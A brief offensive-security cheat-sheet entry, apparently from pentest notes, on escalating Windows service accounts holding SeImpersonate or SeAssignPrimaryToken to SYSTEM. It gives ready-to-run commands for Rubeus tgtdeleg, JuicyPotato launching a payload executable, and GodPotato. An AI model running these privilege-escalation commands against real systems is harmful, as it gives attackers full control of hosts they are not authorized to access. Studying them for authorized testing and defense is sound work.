User Privileges

SeImpersonate and SeAssignPrimaryToken

These privileges allow you to escalate immediately to NT AUTHORITY\SYSTEM through "potato" attacks, which steal an authentication and use it to impersonate a privileged process token. Alternatively, you can perform a delegation TGT request as the network service account and then perform S4U2self abuse:

Rubeus.exe tgtdeleg /nowrap

If you're running on an older OS, try using the classic JuicyPotato:

.\JuicyPotato.exe -l 1337 -p C:\windows\tasks\win.exe -t *

If you're working with anything reasonably modern, try using GodPotato:

.\GodPotato-NET4.exe -cmd "cmd /c whoami"
